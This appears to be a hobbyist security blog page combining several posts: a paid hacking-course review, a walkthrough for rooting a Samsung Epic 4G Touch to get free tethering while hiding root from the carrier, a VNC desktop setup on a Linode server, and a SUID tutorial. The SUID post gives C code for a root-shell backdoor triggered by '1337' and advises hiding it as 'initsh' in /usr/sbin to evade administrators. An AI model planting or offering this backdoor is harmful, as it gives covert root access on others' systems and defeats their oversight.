I recently had the honor to take the full Ninja Security Course for hacking. This was a huge effort on their part. The course is jam packed with instructional videos and slides!

Samurai Skill’s from Anti-Trust on Vimeo.

I spend most of my hacking time behind the wheel of Aircrack-ng, so mostly all of this material was completely new to me. I learned more from the videos than I could have from any book. My brain seems to function much better when I am seeing hands on, how things actually work, so this course was perfect for me.

The above is a screenshot of the course, used without permission. In this section I was taught how to evade an IPS while performing advanced SQL injection attacks. A lot of what I do involves Coldfusion applications communicating to Oracle databases at my job. I can tell you, that any webapp or application programmer, specialist, or even security analyst can seriously benefit from this set of videos alone.

If you browse to the page that offers the course, you will see: http://ninja-sec.com/index.php/samurai-skills/ that the price has recently changed since my last post about this course! It’s now cheaper! $750USD They have added all new videos and PDF files, AND you get a FREE subscription to hakin9 magazine, which isn’t cheap ($180USD+) and probably my personal favorite hacking magazine. They are also offering a full year’s worth of support and updates. This is a huge value. Updates means, updated tools and we all know that tools in infosec are constantly changing.

Even if you are new to the subject, this course would be perfect. It offers much more than all of the others and a complete, solid understanding of how real world penetration testing actually works. I am a huge fan of the Metasploit Project. The recent book published by David Kennedy on the subject was amazing to say the least. For some reason, I simply couldn’t find the time to actually dive straight into the project and test it as much as I could have. This course from Ninja Security teaches you, hands on from scratch how Metasploit is used on a professional level and gave me this missed opportunity.

I highly recommend this course to anyone looking to learn IT Security or advance their skill to the Samurai Level.

~Douglas.

After the update to 2.3.6 my phone was unrooted, as usual. This time I tried the one click method of rooting it as describe here: http://forum.xda-developers.com/showthread.php?t=1342728 And it was as easy as pie. Now, I’m back to root, with the original stock ROM.

~Trevelyn

Abstract

Samsung Galaxy S II Epic 4G (Touch) (US) <-- the phone with the longest name ever. It's a really nice phone, but lacked a few good software features, one being able to create a mobile hotspot from the phone to share my 4G connection without paying an extra (big) monthly fee. So, I had to root the phone by changing it’s kernel to a rooted kernel. This voids my warranty and is easily detectable by any technician at Sprint if I were to take this phone in for a repair. So, after rooting the system, i simply returned it back to the stock kernel. This keeps the phone rooted, but this leaves the “Superuser” application on the phone. The only way I know of how to remove it is by using the ADB shell. Easy enough.

This by no means is a tutorial, WEAKNET LABS is not responsible for damage you may cause to your phone by following along with me.

I switched to Sprint recently and got this phone:

Root it

You need a new kernel to be root on your new machine. I got mine from “Zedomax.” It’s not great at all, in fact it’s poorly designed, but we only use it temporarily. You can download it from his website here. I grabbed the tarball labeled “SPH-D710_Zedomax_EpicTouchKernel-v3.tar” to use with ODIN.
Next, I downloaded ODIN and Samsung Kies. You will need the drivers for the phone for ODIN to recognize it properly. DO NOT rely on Windows to get the drivers for you. And seriously, don’t follow the weird http://epic4gtouchroot.com/ website, it’s convoluted, is missing information and is just wrong sometimes.

Once you have Kies, simply run the application with the phone plugged in and allow it to say it’s completed and the phone is recognized properly. It will look like iTunes, but for your phone. Heh. You can check the Device Manager to see if the device was recognized or not, but that’s kind of overkill. Simply run ODIN. ODIN will show the device with a yellow label under it like so:

Now, you’re ready to go. If not, try unplugging the device and plugging it back in with Kies open. Next, you NEED to exit Kies completely. make sure the tray icon is gone, and no running process of Kies exists. Kies will screw up the flashing process we do with ODIN and could mess up the firmware in the phone. So, once killed, slam the “PDA” button in ODIN and select the tarball of the new kernel. Here is my file list I am using right now:

the file called acs-eg30-stock-pulled.tar is the stock kernel from the phone someone pulled from the phone before rooting it. We will use that after. Now, hit the “Start” button in ODIN. You will see the progress bar turn green and start to fill up. Once done the default setting of “auto reboot” should simply reboot your phone. At this point, I foo bared the shit out of my phone, over and over trying to get it to work properly with ODIN. I tried making the zip files tarballs, I tried all kinds of weird shit, only to realize that Kies was killing my firmware flashes. :( MAKE SURE IT’S CLOSED!! Now, you should check the kernel in the Settings->About Phone->Kernel. You should see something that says “zedomax.” go into your app drawer and look for this icon:

If found, you’re good to go! Now, try an application, like “Better Terminal Emulator.” Here you can type su and should be prompted to allow the application to use Super User (or root) privileges. Click “remember these settings” and click “Okay.” Now each time you use the application, you can just type “su” and you will see something like so:

Put Stock Kernel Back on There!

As I said before, this kernel made my zedomax just sucks. Radio problems seem to be the worst issue, though there is a quick fix for it, that says to update the Master Subsidy Lock Code. This is used when programming the phone with CDMA. It’s not re-programmed or updated and shouldn’t need to be seeing how this is an intermittent issue. So, it still doesn’t properly resolve the issue. Just put the stock kernel back until someone compiles a better working version. Get the acs-eg30-stock-pulled.tar file from the XDA developers and go through the same process of flashing the phone using ODIN. Make sure that Kies is not open!

Now you’re About phone screen should show this:

And you should still have full root access.

Tethering 4G and creating a WiFi Hotspot (AP)

There are many hotspot applications that can be used with a rooted phone in the android market, but not all can be used with this phone. I used this one: 3.1-beta6 WiFi-Tether

Awesome app, doesn’t work at all with the finicky 3DS, as nothing seems to play right with that damned thing, but it works with XBOX 360, and my laptop just fine.

Remove the SuperUser Application

The only way I know of is to grab the ADB shell here and run it. This requires a bit of command line experience, but it’s simple.

Run the shell:

adb shell

Become root:

su

Mount using Yaffs:

mount -o rw,remount -t yaffs2 /dev/block/mtdblock3 /system

Remove the files:

rm /system/xbin/su
rm/system/bin/su
rm /system/app/Superuser.apk

reboot:

reboot


Conclusion

So this is how I rooted the phone and got the WiFi Tethering for free. Rooting the device is the easy part, getting other devices to play well with the software AP is the hard part :)

VNC (Virtual Network Computing) Servers allow one to connect to a machine, via the RFB (remote Frame buffer) protocol, and access it’s desktop remotely as if sitting right in front of that machine. Keyboard, Mouse and all. Linode VPS boxen, to my knowledge, have no GPU’s installed whatsoever. So, obviously there’s no display, or display port even:


weaknetlabs:/appdev# lspci
pcilib: Cannot open /proc/bus/pci
lspci: Cannot find any working access method.
weaknetlabs:/appdev#


BUT, we can still run X11 and Gnome. We just have to connect to the session before starting the X server, or else it will fail with:

Could not get primary PCI info!

waiting for X server to begin accepting connections
giving up.
xinit: Connection reset by peer (errno 104): unable to connect to X server
xinit: No such process (errno 3): Server error.


So let’s connect to a Gnome session on the Linode already! Who cares if there is no display! :D First we need to install some things that may take a long time:


apt-get install xfonts-base gnome xserver-xorg-core vnc4server


Once done, edit the file ~/.vnc/xstartup as root and add the following lines:


#!/bin/sh

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
gdm
x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
x-window-manager &
startx &


Start the VNC Server with:


vncserver :0


Now simply cat the file ~/.vnc/&ltlocalhostname>:1.log and make sure it’s running with either nmap localhost which should show ports 5900,6000 running. Or netstat -pan Netx, connect to it using a VNC Viewer client, Here is a link to a great one for Windows.

Once connected you should see this:

Now type gnome-session into the command prompt and you will have a full blown Gnome Desktop on your Linode server :)

~Douglas.

Here I explain some system administration on UNIX’s Set User ID, or SUID with a short video tutorial after the break.

In UNIX, we can have files (binaries) that can run as the owner of the file. No matter who executes it. This is called a SUID attribute. You can set a file to SUID with:

chmod +4XXX file.exe

I put the exe extension just to show that the file is binary. If you chown (change ownership) of this to root, it will be ran as UID (User ID) “0″ or user “root.” Here is what the file looks like after chmod(ing) it to 4XXX (XXX being your normal rwxrwxrwx settings, exempli gratia – 777, 755, etc. in our case I used 4755):

-rwsr-xr-x 1 root root 0 2011-10-27 22:21 file.exe

Here is what this means: the capital “s” means the file is “suid” or “set user id” which means it will change to the owner’s (in our case “root”) UID of “0″ before executing.
The “r” is “read,” “w” is “write,” and “x” is “executable” BY sets of three for: Owner,Group,Other respectively.

How does it know the UID of the owner root, you say? It most likely looks at the lines in /etc/passwd:

root:x:0:0:root:/root:/bin/bash

The first zero is the UID, the second is the GUID, or Group User ID. the “x” means that the password hash and salt are hidden in the /etc/shadow file.

Now, this does not work with shell scripts for more than just security purposes. If you’d like to do something like that, you would need to play with sudo and the sudoers file, but not all UNIX systems come with sudo.

So how do we work around that? By compiling an easy C program that runs it via a system() call!

#include<stdio.h>
#include<stdlib.h>
int main(int argc, char *argv[]){
 if(atoi(argv[1]) == 1337){
  printf("shelling out.\n");
  system ("sh");
 }
 else{ }
 return 0;
}

All this simple application does is run “sh”, or spawn a new shell, as root IFF the number “1337″ is passed to it. Why did I include the number part? Well, to backdoor a system it’s incredibly easy to hide this small application, and since it must|is compiled, if found, the owner of the machine won’t know what it is. I usually call this something like “initsh” and put it in /usr/sbin to look very non suspicious to the novice system administrator. My secret is out!!

echo $PATH | sed 's/:/\n/g' | xargs ls | grep initsh

Check out the video below:

~Douglas.